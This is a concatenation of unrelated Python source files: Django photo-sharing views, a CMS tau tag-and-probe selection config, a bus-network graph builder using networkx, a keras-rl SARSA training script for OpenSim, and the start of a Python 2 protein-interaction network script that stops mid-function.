    """Top page view (comments translated from Japanese)."""
    # Render index.html.
    template_name = 'index.html'
    # Apply order_by() to PhotoPost objects: newest posting date first.
    queryset = PhotoPost.objects.order_by('-posted_at')
    # Number of records shown per page.
    paginate_by = 6

# class IndexView(TemplateView):
#     """Top page view."""
#     # Render index.html.
#     template_name = 'index.html'
# The decorator restricts access to CreatePhotoView to logged-in users.
# Anonymous users are redirected to settings.LOGIN_URL.
@method_decorator(login_required, name='dispatch')
class CreatePhotoView(CreateView):
    """Photo submission page view.

    Works with the model and fields defined in PhotoPostForm to register
    the submitted data in the database.

    Attributes:
        form_class: form class with the model and fields registered
        template_name: template to render
        success_url: redirect target after the database save completes
    """
    # Register forms.py's PhotoPostForm as the form class.
    form_class = PhotoPostForm
    # Template to render.
    template_name = "post_photo.html"
    # Redirect target after the form data is saved.
    success_url = reverse_lazy('photo:post_success')

    def form_valid(self, form):
        """Override of CreateView.form_valid().

        Called when the form passes validation; the form data is saved here.

        Parameters:
            form(django.forms.Form): the validated form.

        Returns the superclass's form_valid() result, which redirects to
        success_url.
        """
        # commit=False: obtain the POSTed data without saving it yet.
        postdata = form.save(commit=False)
        # Store the posting user's id in the model's user field.
        postdata.user = self.request.user
        # Save the post to the database.
        postdata.save()
        # Return value is the superclass's form_valid() result (HttpResponseRedirect).
        return super().form_valid(form)
class PostSuccessView(TemplateView):
    """Submission-complete page view.

    Attributes:
        template_name: template to render
    """
    # Render post_success.html.
    template_name = 'post_success.html'
class CategoryView(ListView):
    """Category page view.

    Attributes:
        template_name: template to render
        paginate_by: number of records shown per page
    """
    # Render index.html.
    template_name = 'index.html'
    # Number of records shown per page.
    paginate_by = 6

    def get_queryset(self):
        """Run the query.

        get_queryset() is overridden (instead of using the class variable
        queryset) because self.kwargs is needed here.

        Returns:
            the records retrieved by the query
        """
        # self.kwargs holds the URL keyword arguments; 'category' is the
        # id of the Categorys-table row.
        category_id = self.kwargs['category']
        # Narrow with filter(field=id).
        categories = PhotoPost.objects.filter(category=category_id).order_by('-posted_at')
        # Return the records retrieved by the query.
        return categories
class UserView(ListView):
    """Per-user post list view.

    Attributes:
        template_name: template to render
        paginate_by: number of records shown per page
    """
    # Render index.html.
    template_name = 'index.html'
    # Number of records shown per page.
    paginate_by = 6

    def get_queryset(self):
        """Run the query.

        get_queryset() is overridden (instead of using the class variable
        queryset) because self.kwargs is needed here.

        Returns:
            the records retrieved by the query
        """
        # self.kwargs holds the URL keyword arguments; 'user' is the id
        # from the user table.
        user_id = self.kwargs['user']
        # Narrow with filter(field=id).
        user_list = PhotoPost.objects.filter(user=user_id).order_by('-posted_at')
        # Return the records retrieved by the query.
        return user_list
class DetailView(DetailView):
    """Detail page view.

    Inherits DetailView to display the details of a single post.

    Attributes:
        template_name: template to render
        model: model class
    """
    # NOTE(review): this class shadows the imported django DetailView name;
    # renaming would change the public interface, so it is left as is.
    # Render detail.html.
    template_name = 'detail.html'
    # Set the model class variable to the PhotoPost model.
    model = PhotoPost
class MypageView(ListView):
    """"My page" view.

    Attributes:
        template_name: template to render
        paginate_by: number of records shown per page
    """
    # Render mypage.html.
    template_name = 'mypage.html'
    # Number of records shown per page.
    paginate_by = 6

    def get_queryset(self):
        """Run the query.

        get_queryset() is overridden (instead of using the class variable
        queryset) because the logged-in user is needed here.

        Returns:
            the records retrieved by the query
        """
        # The currently logged-in user is stored in HttpRequest.user;
        # narrow with filter(user field = user object).
        queryset = PhotoPost.objects.filter(user=self.request.user).order_by('-posted_at')
        # Return the records retrieved by the query.
        return queryset
class PhotoDeleteView(DeleteView):
    """View that deletes a PhotoPost record.

    Attributes:
        model: model to operate on
        template_name: template to render
        success_url: redirect target after the deletion completes
    """
    # The target of the operation is the PhotoPost model.
    model = PhotoPost
    # Render photo_delete.html (the confirmation page).
    template_name = 'photo_delete.html'
    # Redirect to "my page" when the deletion completes.
    success_url = reverse_lazy('photo:mypage')
    # Fix: the previous delete() override only called super().delete() and
    # has been removed as dead code; DeleteView already deletes the object
    # and returns HttpResponseRedirect(success_url) on its own.
|
import FWCore.ParameterSet.Config as cms
import copy
from DisappTrks.StandardAnalysis.Cuts import * # Put all the individual cuts in this file
from DisappTrks.StandardAnalysis.EventSelections import * # Get the composite cut definitions
from DisappTrks.StandardAnalysis.MuonTagProbeSelections import * # Get the composite cut definitions
################################################################################
## Tau tag skim
################################################################################
# Base skim: events firing the single-tau trigger, with tag-tau quality cuts.
TauTagSkim = cms.PSet(
    name = cms.string("TauTagSkim"),
    triggers = triggersSingleTau,
    cuts = cms.VPSet (),
)
# See SMP-12-023 for example of W->mu nu selection
tagTauCuts = [
    cutTauPt50,
    cutTauEta21,
    cutTauTightID,
    cutTauTightPFIso,
]
addCuts(TauTagSkim.cuts, tagTauCuts)
##################################################
## Cannot go lower than 50 GeV because of trigger
##################################################
# Full tag selection: the skim plus jet and track quality/isolation cuts.
TauTagPt50 = copy.deepcopy(TauTagSkim)
TauTagPt50.name = cms.string("TauTagPt50")
cutsToAdd = [
    cutTauArbitration,
    cutJetPt,
    cutJetEta,
    cutJetTightLepVeto,
    cutTrkPt,
    cutTrkTauDR0p1,
    cutTrkMatchRecoTau,
    cutTrkEta,
    cutTrkEcalGapVeto,
    cutTrkEtaMuonIneff1,
    cutTrkEtaMuonIneff2,
    cutTrkFiducialElectron,
    cutTrkFiducialMuon,
    cutTrkNValidHits,
    cutTrkNMissIn,
    cutTrkNMissMid,
    cutTrkIso,
    cutTrkD0,
    cutTrkDZ,
]
addCuts(TauTagPt50.cuts, cutsToAdd)
# Variants: no trigger requirement, MET trigger, and an explicit MET cut.
# NOTE(review): these three PSets are re-created identically further below
# (after the background-estimate section); the later definitions overwrite
# these ones.
TauTagPt50NoTrig = copy.deepcopy(TauTagPt50)
TauTagPt50NoTrig.name = cms.string("TauTagPt50NoTrig")
TauTagPt50NoTrig.triggers = cms.vstring()
TauTagPt50MetTrig = copy.deepcopy(TauTagPt50)
TauTagPt50MetTrig.name = cms.string("TauTagPt50MetTrig")
TauTagPt50MetTrig.triggers = triggersMet
TauTagPt50MetCut = copy.deepcopy(TauTagPt50)
TauTagPt50MetCut.name = cms.string("TauTagPt50MetCut")
cutsToAdd = [
    cutTauMetMinusOne,
]
addCuts(TauTagPt50MetCut.cuts, cutsToAdd)
##################################################
## Channels for real life background estimate. Increase pt threshold to that
## used in search region and add missing outer hits cut.
##################################################
# Currently no extra cuts are enabled (both candidates are commented out),
# so this addCuts call is a no-op.
cutsToAdd = [
    # cutTrkEcalo,
    # cutTrkNMissOut,
]
addCuts(TauTagPt50.cuts, cutsToAdd)
# Re-derive the variants so they pick up the (possibly) extended TauTagPt50;
# these overwrite the identically named PSets defined above.
TauTagPt50NoTrig = copy.deepcopy(TauTagPt50)
TauTagPt50NoTrig.name = cms.string("TauTagPt50NoTrig")
TauTagPt50NoTrig.triggers = cms.vstring()
TauTagPt50MetTrig = copy.deepcopy(TauTagPt50)
TauTagPt50MetTrig.name = cms.string("TauTagPt50MetTrig")
TauTagPt50MetTrig.triggers = triggersMet
TauTagPt50MetCut = copy.deepcopy(TauTagPt50)
TauTagPt50MetCut.name = cms.string("TauTagPt50MetCut")
cutsToAdd = [
    cutTauMetMinusOne,
]
addCuts(TauTagPt50MetCut.cuts, cutsToAdd)
################################################################################
## Tau tag and probe sample
################################################################################
# Muon-tagged events with an isolated track probe, for Z->tau tau studies.
ZtoTauIsoTrk = copy.deepcopy(MuonTagSkim)
ZtoTauIsoTrk.name = cms.string("ZtoTauIsoTrk")
muTrkCuts = [
    cutMuTrkInvMass10,
]
addCuts(ZtoTauIsoTrk.cuts, [cutMuonMT])
addCuts(ZtoTauIsoTrk.cuts, [cutMuonArbitration])
addCuts(ZtoTauIsoTrk.cuts, [cutTrkPt30])
addCuts(ZtoTauIsoTrk.cuts, isoTrkCuts)
addCuts(ZtoTauIsoTrk.cuts, muTrkCuts)
# Drop cuts inherited from the skim that conflict with this selection.
cutsToRemove = [
    cutTrkPt,
    cutTrkJetDeltaPhi,
]
removeCuts(ZtoTauIsoTrk.cuts, cutsToRemove)
# Probe track: additionally veto tracks matched to electrons or muons.
ZtoTauProbeTrk = copy.deepcopy(ZtoTauIsoTrk)
ZtoTauProbeTrk.name = cms.string("ZtoTauProbeTrk")
cutsToAdd = [
    cutTrkElecVeto,
    cutTrkMuonVeto,
]
addCuts(ZtoTauProbeTrk.cuts, cutsToAdd)
addCuts(ZtoTauProbeTrk.cuts, [cutTrkArbitration])
# Add Z-window cuts: mu-track invariant mass in [40, 75] and opposite sign.
ZtoTauProbeTrkWithZCuts = copy.deepcopy(ZtoTauProbeTrk)
ZtoTauProbeTrkWithZCuts.name = cms.string("ZtoTauProbeTrkWithZCuts")
cutsToAdd = [
    cutMuTrkInvMass40To75,
    cutMuTrkOS,
]
addCuts(ZtoTauProbeTrkWithZCuts.cuts, cutsToAdd)
# Disappearing-track selection: also veto hadronic-tau candidates.
ZtoTauDisTrk = copy.deepcopy(ZtoTauProbeTrkWithZCuts)
ZtoTauDisTrk.name = cms.string("ZtoTauDisTrk")
cutsToAdd = [
    cutTrkTauHadVeto,
]
addCuts(ZtoTauDisTrk.cuts, cutsToAdd)
# ... and finally the calorimeter-energy cut.
ZtoTauDisTrkWithECaloCut = copy.deepcopy(ZtoTauDisTrk)
ZtoTauDisTrkWithECaloCut.name = cms.string("ZtoTauDisTrkWithECaloCut")
cutsToAdd = [
    cutTrkEcalo,
]
addCuts(ZtoTauDisTrkWithECaloCut.cuts, cutsToAdd)
|
import csv
import math
import matplotlib.pyplot as plt
from bisect import bisect_left
import networkx as nx
# specification of the time discretization step (time interval), in seconds
dt = 30
def gen_bus_stop_nodes(G):
    """Add one 'stop_node' per operational bus stop from Bus_stops_coord.csv."""
    with open('Bus_stops_coord.csv', 'r') as bsc:
        BusStopsReader = csv.DictReader(bsc)
        for row in BusStopsReader:
            if row['status'] != 'OP':  # virtual bus stops are not represented in the graph for journey planning
                continue
            # Bus stop nodes are named as b+bus_stop_code (e.g. b1).
            G.add_node('b' + str(row['code']), id=row['code'], pos=[float(row['x']), float(row['y'])], station=row['name'], node_type='stop_node', \
                zone=row['zone'], section_id=row['section_id'], section_offset=float(row['section_offset']), stop_length=float(row['length']), \
                node_graph_type='Bus')
def gen_bus_route_nodes(G):
    """Add one 'route_node' per (stop, line, sequence) entry of journeytime.csv,
    copying position/zone/section attributes from the matching stop node."""
    stop_list = []
    with open('Bus_stops_coord.csv', 'r') as bss:
        BusStopSequenceReader = csv.DictReader(bss)
        for row in BusStopSequenceReader:
            stop_list.append(row['code'])
    with open('journeytime.csv', 'r') as jt:
        PT_Data = csv.reader(jt)
        for row in PT_Data:
            if row[0] in stop_list:
                # Route nodes are named 'stop_code,line_id,sequence_number'.
                G.add_node(row[0] + ',' + row[1] + ',' + row[4], node_id=row[0], line_id=row[1], station=G.nodes['b' + str(row[0])]['station'], \
                    pos=G.nodes['b' + str(row[0])]['pos'], sequence_number=row[4], node_type='route_node', zone=G.nodes['b' + str(row[0])]['zone'], \
                    section_id=G.nodes['b' + str(row[0])]['section_id'], section_offset=G.nodes['b' + str(row[0])]['section_offset'], \
                    stop_length=G.nodes['b' + str(row[0])]['stop_length'], node_graph_type='Bus')
def gen_bus_route_edges(G):
    """Connect consecutive route nodes of each bus line with 'pt_route_edge'
    edges: an edge n -> m is added when both are route nodes of the same
    line and m's sequence number is exactly n's + 1.

    Fix: the original nested scan over all node pairs was O(n^2); route
    nodes are now indexed by (line_id, sequence_number) once, making the
    pass O(n).  setdefault keeps the first node seen for a key, matching
    the original first-match-then-break behaviour.
    """
    successor = {}
    for node in G:
        if G.nodes[node]['node_type'] == 'route_node':
            key = (G.nodes[node]['line_id'], int(G.nodes[node]['sequence_number']))
            successor.setdefault(key, node)
    for n in G:
        if G.nodes[n]['node_type'] == 'route_node':
            node = successor.get((G.nodes[n]['line_id'], int(G.nodes[n]['sequence_number']) + 1))
            if node is not None:
                G.add_edge(n, node, line_id=G.nodes[node]['line_id'], edge_type='pt_route_edge', up_node_graph_type=G.nodes[n]['node_graph_type'], \
                    dstr_node_graph_type=G.nodes[node]['node_graph_type'], up_node_type=G.nodes[n]['node_type'], \
                    dstr_node_type=G.nodes[node]['node_type'], up_node_zone=G.nodes[n]['zone'], dstr_node_zone=G.nodes[node]['zone'])
def gen_bus_dep_arr_timetable(G):
    """Build per-route-node departure and arrival timetables from
    journeytime.csv.

    Returns:
        (dep_time_dict, arr_time_dict): dicts keyed by route-node name
        ('stop,line,seq'); each value carries a {run_id: seconds-since-
        midnight} mapping plus the node's sequence_number and line_id.

    Fix: the original reopened and rescanned journeytime.csv once per
    route node (O(nodes * rows)); the file is now read exactly once and
    each row is matched against the node index (O(rows)).
    """
    dep_time_dict = {}
    arr_time_dict = {}
    for n in G:
        if G.nodes[n]['node_type'] == 'route_node':
            dep_time_dict[n] = {'departure_time': {}, 'sequence_number': G.nodes[n]['sequence_number'], 'line_id': G.nodes[n]['line_id']}
            arr_time_dict[n] = {'arrival_time': {}, 'sequence_number': G.nodes[n]['sequence_number'], 'line_id': G.nodes[n]['line_id']}
    with open('journeytime.csv', 'r') as jt:
        for row in csv.reader(jt):
            node = row[0] + ',' + row[1] + ',' + row[4]
            if node in dep_time_dict:
                # row[5] = arrival time 'h:m:s', row[6] = dwell time 'h:m:s',
                # row[2] = vehicle run id.
                ah, am, asec = row[5].split(':')
                r_node_arr_time = int(ah) * 3600 + int(am) * 60 + int(asec)
                dh, dm, dsec = row[6].split(':')
                r_node_dwell_time = int(dh) * 3600 + int(dm) * 60 + int(dsec)
                dep_time_dict[node]['departure_time'][row[2]] = r_node_arr_time + r_node_dwell_time
                arr_time_dict[node]['arrival_time'][row[2]] = r_node_arr_time
    return dep_time_dict, arr_time_dict
def assign_bus_edge_dep_timetable(G, departure_timetable):
    """Copy each edge's upstream-node departure timetable onto the edge.

    Assumes every edge's source node has an entry in departure_timetable.
    """
    for up_node, down_node in G.edges:
        timetable = departure_timetable[up_node]['departure_time']
        G[up_node][down_node]['departure_time'] = timetable
def find_ge(a, x):
    """Binary search: return (index, value) of the leftmost item of the
    sorted sequence *a* that is greater than or equal to *x*.

    Raises:
        ValueError: if every item of *a* is smaller than *x* (the original
        raised a bare ValueError with no diagnostic message).
    """
    i = bisect_left(a, x)
    if i != len(a):
        return i, a[i]
    raise ValueError('no item in the sorted sequence is >= %r' % (x,))
def gen_bus_route_edge_waiting_times(G):
    """For every pt_route_edge, compute the discretized waiting time (and the
    vehicle run that serves it) at each time step t in [0, 86400) with step dt.

    Returns:
        {(u, v): {'wait_time': {t: {'discr_value': seconds, 'veh_id': id}}}}
    """
    discr_waiting_times = dict()
    # Pre-fill the table with empty slots for every route edge and time step.
    for u, v, weight in G.edges.data():
        if weight['edge_type'] == 'pt_route_edge':
            discr_waiting_times.update({(u,v): {'wait_time': dict()}})
            for t in range(0, 86400, dt):
                discr_waiting_times[(u,v)]['wait_time'].update({t: {'discr_value': None, 'veh_id' : None}})
    for edge, attrs in discr_waiting_times.items():
        # Departure times of the edge's upstream node, sorted ascending.
        sorted_dep_time_dict = {v_id: d_t for v_id, d_t in sorted(G[edge[0]][edge[1]]['departure_time'].items(), key=lambda item: item[1])}
        list_of_ptedge_dep_times = list(sorted_dep_time_dict.values())
        list_of_ptedge_veh_ids = list(sorted_dep_time_dict.keys())
        for time, info in attrs['wait_time'].items():
            if time > list_of_ptedge_dep_times[-1]:
                # Past the last departure of the day: wrap around and wait
                # for the first departure of the next day.
                earlier_dep_time = list_of_ptedge_dep_times[0]
                index = 0
                wait_time = earlier_dep_time + (86400-time)
                discr_wait_time = wait_time - (wait_time%dt)
            elif time < list_of_ptedge_dep_times[0]:
                # Before the first departure of the day.
                earlier_dep_time = list_of_ptedge_dep_times[0]
                index = 0
                wait_time = earlier_dep_time - time
                discr_wait_time = wait_time - (wait_time%dt)
            else:
                # Next departure at or after t (binary search).
                index, earlier_dep_time = find_ge(list_of_ptedge_dep_times, time)
                wait_time = earlier_dep_time - time
                discr_wait_time = wait_time - (wait_time%dt)
            vehicle_id = list_of_ptedge_veh_ids[index]
            info['discr_value'] = discr_wait_time
            info['veh_id'] = vehicle_id
    return discr_waiting_times
# def assign_bus_edge_waiting_times(G, waiting_times = {}):
# for e in G.edges:
# if G[e[0]][e[1]]['edge_type'] == 'pt_route_edge':
# G[e[0]][e[1]]['wait_time'] = waiting_times[(e[0], e[1])]
def gen_bus_route_edge_tt(G, departure_timetable, arrival_timetable):
    """Compute discretized in-vehicle travel times for every pt_route_edge at
    each time step, using the vehicle run chosen by the edge's wait_time table.

    Returns:
        {edge: {'travel_time': {t: seconds}}}
    """
    # Map each route_id to its sorted list of (1-based) stop sequence numbers.
    # NOTE(review): indentation reconstructed -- the inner rescan of the file
    # is assumed to run only when a new route_id is first seen; confirm.
    bus_route_sequence = dict()
    with open('Bus_stop_sequence.csv', 'r') as bss1:
        BusStopSeq1 = csv.DictReader(bss1)
        for row in BusStopSeq1:
            if row['route_id'] not in bus_route_sequence:
                bus_route_sequence.update({row['route_id']: list()})
                with open('Bus_stop_sequence.csv', 'r') as bss2:
                    BusStopSeq2 = csv.DictReader(bss2)
                    for line in BusStopSeq2:
                        if row['route_id'] == line['route_id']:
                            bus_route_sequence[row['route_id']].append(1+int(line['sequence_no']))
                bus_route_sequence[row['route_id']].sort()
    discr_travel_times = dict()
    for edge in G.edges():
        if G[edge[0]][edge[1]]['edge_type'] == 'pt_route_edge':
            discr_travel_times.update({edge: {'travel_time': dict()}})
            v_node_sequence = int(G.nodes[edge[1]]['sequence_number'])
            for t in range(0, 86400, dt):
                # Vehicle run serving this edge at time t (from wait_time).
                vehicle_run_id = G[edge[0]][edge[1]]['wait_time'][t]['veh_id']
                if v_node_sequence == bus_route_sequence[G.nodes[edge[1]]['line_id']][-1]:
                    # Terminal stop of the route: use its arrival time, since
                    # it has no departure.
                    in_vehicle_time = arrival_timetable[edge[1]]['arrival_time'][vehicle_run_id] - \
                        departure_timetable[edge[0]]['departure_time'][vehicle_run_id]
                    discr_in_vehicle_time = in_vehicle_time - (in_vehicle_time%dt)
                    discr_travel_times[edge]['travel_time'].update({t: discr_in_vehicle_time})
                else:
                    if vehicle_run_id not in departure_timetable[edge[1]]['departure_time']:
                        # The run does not serve the downstream stop: use a
                        # sentinel "infinite" travel time.
                        in_vehicle_time = 999999999
                        discr_in_vehicle_time = in_vehicle_time - (in_vehicle_time%dt)
                        discr_travel_times[edge]['travel_time'].update({t: discr_in_vehicle_time})
                        continue
                    in_vehicle_time = departure_timetable[edge[1]]['departure_time'][vehicle_run_id] - \
                        departure_timetable[edge[0]]['departure_time'][vehicle_run_id]
                    discr_in_vehicle_time = in_vehicle_time - (in_vehicle_time%dt)
                    discr_travel_times[edge]['travel_time'].update({t: discr_in_vehicle_time})
    return discr_travel_times
def gen_bus_route_node_transfer_edges(G):
    """Link each stop_node with its route_nodes via pt_transfer_edges:
    boarding (stop -> route) carries a discretized 5 s penalty, alighting
    (route -> stop) is free.
    """
    for u in G:
        for v in G:
            if u != v:
                if G.nodes[u]['node_type'] == 'stop_node' and G.nodes[v]['node_type'] == 'route_node' and u == 'b' + str(G.nodes[v]['node_id']):
                    # NOTE(review): with dt=30, 5-(5%dt) evaluates to 0, so the
                    # boarding travel_time and distance are both 0 -- confirm
                    # this discretization is intended.
                    G.add_edge(u, v, travel_time=5-(5%dt), distance=math.ceil((5-(5%dt)) * 1.2), edge_type='pt_transfer_edge', up_node_graph_type=G.nodes[u]['node_graph_type'], \
                        dstr_node_graph_type=G.nodes[v]['node_graph_type'], up_node_type=G.nodes[u]['node_type'], \
                        dstr_node_type=G.nodes[v]['node_type'], up_node_zone=G.nodes[u]['zone'], dstr_node_zone=G.nodes[v]['zone'])
                    G.add_edge(v, u, travel_time=0, distance=0, edge_type='pt_transfer_edge', up_node_graph_type=G.nodes[v]['node_graph_type'], \
                        dstr_node_graph_type=G.nodes[u]['node_graph_type'], up_node_type=G.nodes[v]['node_type'], \
                        dstr_node_type=G.nodes[u]['node_type'], up_node_zone=G.nodes[v]['zone'], dstr_node_zone=G.nodes[u]['zone'])
def gen_assign_bus_route_edge_distances(G):
    """Compute and store the 'distance' attribute (metres, rounded up) of
    every pt_route_edge by chaining the road sections between the two stops
    and summing polyline segment lengths.

    NOTE(review): indentation reconstructed from a whitespace-mangled source;
    the nesting below is the most plausible reading -- verify against the
    original before relying on edge cases.
    """
    for e in G.edges:
        if G[e[0]][e[1]]['edge_type'] == 'pt_route_edge':
            # Collect the ordered list of section ids between the two stops.
            edge_section_sequence_list = []
            with open('Bus_routes.csv', 'r') as br:
                BusRouteReader = csv.DictReader(br)
                for row in BusRouteReader:
                    if G[e[0]][e[1]]['line_id'] == row['route_id'] and G.nodes[e[0]]['section_id'] == row['section_id']:
                        # Section of the upstream stop: start of the chain.
                        edge_section_sequence_list.append(row['section_id'])
                        section_seq_num = int(row['sequence_no'])
                        continue
                    if edge_section_sequence_list != []:
                        if row['route_id'] == G[e[0]][e[1]]['line_id'] and int(row['sequence_no']) == section_seq_num + 1:
                            edge_section_sequence_list.append(row['section_id'])
                            section_seq_num = int(row['sequence_no'])
                            if row['section_id'] == G.nodes[e[1]]['section_id']:
                                break  # reached the downstream stop's section
            seg_edge_dist = 0
            for section_id in edge_section_sequence_list:
                if section_id == edge_section_sequence_list[-1]:
                    # Last section: only the offset up to the downstream stop.
                    seg_edge_dist += G.nodes[e[1]]['section_offset'] + G.nodes[e[1]]['stop_length']
                    break
                # Sum the Euclidean lengths of the section's polyline segments.
                with open('road_segments_poly.csv', 'r') as rsp:
                    SegmentPolylineReader1 = csv.DictReader(rsp)
                    for row in SegmentPolylineReader1:
                        if section_id == row['id']:
                            with open('road_segments_poly.csv', 'r') as rsp:
                                SegmentPolylineReader2 = csv.DictReader(rsp)
                                for line in SegmentPolylineReader2:
                                    if section_id == line['id'] and int(line['seq_id']) == int(row['seq_id']) + 1:
                                        seg_edge_dist += math.sqrt(sum([(a - b) ** 2 for a, b in zip((float(row['x']), float(row['y'])), (float(line['x']), float(line['y'])))]))
                                        break
                if section_id == edge_section_sequence_list[0]:
                    # First section: subtract the part before the upstream stop.
                    seg_edge_dist -= G.nodes[e[0]]['section_offset']
            G[e[0]][e[1]]['distance'] = math.ceil(seg_edge_dist)
def gen_assign_bus_edge_cost(G):
    """Build a time-dependent monetary cost table for every edge:
    distance-proportional for pt_route_edges (peak/off-peak rates per metre),
    zero for all other edges.

    Returns:
        {edge: {'pt_cost': {t: cost}}} for route edges,
        {edge: {'pt_cost': 0}} otherwise.
    """
    # Rate per metre by time-of-day window (seconds since midnight);
    # the higher rate covers the morning and evening peaks.
    costs = {(0, 23399): 0.0019, (23400, 34200): 0.0029, (34201, 57599): 0.0019, (57600, 68400): 0.0029, \
        (68401, 86399): 0.0019}
    costs_dict = dict()
    for e in G.edges:
        if G[e[0]][e[1]]['edge_type'] == 'pt_route_edge':
            costs_dict.update({e: {'pt_cost': dict()}})
            for t in range(0, 86400, dt):
                for time_interval in costs:
                    if t >= time_interval[0] and t <= time_interval[1]:
                        cost = math.ceil(costs[time_interval] * G[e[0]][e[1]]['distance'])
                        costs_dict[e]['pt_cost'].update({t: cost})
                        break
        else:
            # Transfer (and any other) edges are free.
            costs_dict.update({e: {'pt_cost': 0}})
    return costs_dict
#---------------------------------------------------------------------------------------------------------------------------
# -------function calculates and assign the time-dependent zone-to-zone cost for zone-to-zone fare schemes; in transfer edges the cost is zero-------
# def gen_assign_bus_edge_zone_to_zone_cost(G): # the cost tables is hardcoded here
# zone_to_zone_cost = {(0, 23399): {('1', '1'): 16, ('1', '2'): 16, ('1', '3'): 20.5, ('2', '1'): 16, ('2', '2'): 16, ('2', '3'): 16, ('3', '1'): 20.5, ('3', '2'): 16, ('3', '3'): 16}, (23400, 34200): {('1', '1'): 20, ('1', '2'): 20, ('1', '3'): 24.5, ('2', '1'): 20, ('2', '2'): 20, ('2', '3'): 20, ('3', '1'): 24.5, ('3', '2'): 20, ('3', '3'): 20}, (34201, 57599): {('1', '1'): 16, ('1', '2'): 16, ('1', '3'): 20.5, ('2', '1'): 16, ('2', '2'): 16, ('2', '3'): 16, ('3', '1'): 20.5, ('3', '2'): 16, ('3', '3'): 16}, (57600, 68400): {('1', '1'): 20, ('1', '2'): 20, ('1', '3'): 24.5, ('2', '1'): 20, ('2', '2'): 20, ('2', '3'): 20, ('3', '1'): 24.5, ('3', '2'): 20, ('3', '3'): 20}, (68401, 86399): {('1', '1'): 16, ('1', '2'): 16, ('1', '3'): 20.5, ('2', '1'): 16, ('2', '2'): 16, ('2', '3'): 16, ('3', '1'): 20.5, ('3', '2'): 16, ('3', '3'): 16}}
# # morning_off_peak = (0, 23399)
# # morning_peak = (23400, 34200)
# # afternoon_off_peak = (34201, 57599)
# # evening_peak = (57600, 68400)
# # evening_off_peak = (68401, 86399)
# for e in G.edges:
# if G[e[0]][e[1]]['edge_type'] == 'pt_route_edge':
# G[e[0]][e[1]]['pt_zone_to_zone_cost'] = zone_to_zone_cost
# else:
# G[e[0]][e[1]]['pt_zone_to_zone_cost'] = 0
#---------------------------------------------------------------------------------------------------------------
def assign_bus_stop_access_nodes(G):
    """For every stop_node, record the road sections, links and road-network
    nodes through which the stop can be accessed (as node attributes
    'access_segs_id', 'access_links_id' and 'access_nodes_id').

    Note: the CSV files are re-opened per stop, which is slow for large
    networks but keeps memory use minimal.
    """
    for stop in G:
        if G.nodes[stop]['node_type'] == 'stop_node':
            G.nodes[stop]['access_segs_id'] = []
            G.nodes[stop]['access_links_id'] = []
            G.nodes[stop]['access_nodes_id'] = []
            # Sections on which the stop itself lies.
            with open('Bus_stops_coord.csv', 'r') as bsc:
                BusStopAccessReader = csv.DictReader(bsc)
                for row in BusStopAccessReader:
                    if 'b' + str(row['code']) == stop:
                        G.nodes[stop]['access_segs_id'].append(row['section_id'])
            # Links containing those sections.
            for access_segment in G.nodes[stop]['access_segs_id']:
                with open('road_segments.csv', 'r') as rs:
                    RoadSegmentReader = csv.DictReader(rs)
                    for row in RoadSegmentReader:
                        if access_segment == row['id']:
                            G.nodes[stop]['access_links_id'].append(row['link_id'])
                            break
            # End nodes of those links (deduplicated).
            for link in G.nodes[stop]['access_links_id']:
                with open('Road_links.csv', 'r') as rl:
                    RoadLinksReader = csv.DictReader(rl)
                    for row in RoadLinksReader:
                        if link == row['id']:
                            if row['from_node'] not in G.nodes[stop]['access_nodes_id']:
                                G.nodes[stop]['access_nodes_id'].append(row['from_node'])
                            if row['to_node'] not in G.nodes[stop]['access_nodes_id']:
                                G.nodes[stop]['access_nodes_id'].append(row['to_node'])
                            break
## ---- function that plots the train graph----------
#def plot_bus_graph(G):
# pos = nx.get_node_attributes(G, 'pos')
# nx.draw_networkx(G, pos) # Graph with node attributes
# plt.show()
##------------------------------------------------------------- |
import random
import gym
import numpy as np
from collections import deque
from keras.models import Sequential
from keras.layers import Dense, Activation, Flatten
from keras.optimizers import Adam
import opensim as osim
import sys
from rl.policy import BoltzmannQPolicy
from rl.agents import SARSAAgent
#from rl.random import OrnsteinUhlenbeckProcess
from osim.env import *
from osim.http.client import Client
import argparse
import math
# Environment name; only used in the saved-weights filename.
ENV_NAME = 'Human'

# Command line parameters
parser = argparse.ArgumentParser(description='Train or test neural net motor controller')
parser.add_argument('--steps', dest='EPISODES', action='store', default=10000, type=int)
parser.add_argument('--visualize', dest='visualize', action='store_true', default=False)
args = parser.parse_args()

# Get the environment and extract the number of actions.
env = RunEnv(args.visualize)
np.random.seed(123)  # fixed seeds for reproducibility
env.seed(123)
nb_actions = env.action_space.shape[0]

# Next, we build a very simple model: three 16-unit ReLU layers and a
# linear output over the action dimensions.
model = Sequential()
model.add(Flatten(input_shape=(1,) + env.observation_space.shape))
model.add(Dense(16))
model.add(Activation('relu'))
model.add(Dense(16))
model.add(Activation('relu'))
model.add(Dense(16))
model.add(Activation('relu'))
model.add(Dense(nb_actions))
model.add(Activation('linear'))
print(model.summary())

# SARSA does not require a memory.
policy = BoltzmannQPolicy()
sarsa = SARSAAgent(model=model, nb_actions=nb_actions, nb_steps_warmup=10, policy=policy)
sarsa.compile(Adam(lr=1e-3), metrics=['mae'])

# Okay, now it's time to learn something! We visualize the training here for show, but this
# slows down training quite a lot. You can always safely abort the training prematurely using
# Ctrl + C.
sarsa.fit(env, nb_steps=args.EPISODES, visualize=False, verbose=2)

# After training is done, we save the final weights.
sarsa.save_weights('sarsa_{}_weights.h5f'.format(ENV_NAME), overwrite=True)

# Finally, evaluate our algorithm for 5 episodes.
sarsa.test(env, nb_episodes=5, visualize=True)
|
import pandas as pd
import scipy.stats as sci
import seaborn as sns
import matplotlib.pyplot as plt
import matplotlib.patches as mpatches
import numpy as np
import glob
from decimal import Decimal
import networkx as nx
def makePPIandTransfacFile():
    # NOTE(review): Python 2 source (print statements, file.xreadlines()).
    # Writes a combined edge list: BioGRID physical/direct PPIs (in both
    # directions, tagged 'PP') plus TRANSFAC TF->target edges (tagged 'PG').
    out_file = open('../rawData/PPIandTRANSFAC.txt','w+')
    print 'get ppi network'
    # Build an Entrez-id -> gene-symbol mapping, skipping the header line.
    sym2entz_file = open("../rawData/sym2entz.txt")
    entz2sym = {}
    header=True
    for line in sym2entz_file.xreadlines():
        if header: header=False; continue
        sym, entz = line.replace('\n','').replace('\r','').split('\t')
        if entz != '':
            entz2sym[entz] = sym
    sym2entz_file.close()
    ####
    read_file = open("../rawData/BIOGRID-ORGANISM-Homo_sapiens-3.4.148.mitab.txt")
    for line in read_file.xreadlines():
        if line.startswith('#'): continue
        line_list = line.replace('\n','').split('\t')
        # Keep only physical-association / direct-interaction records.
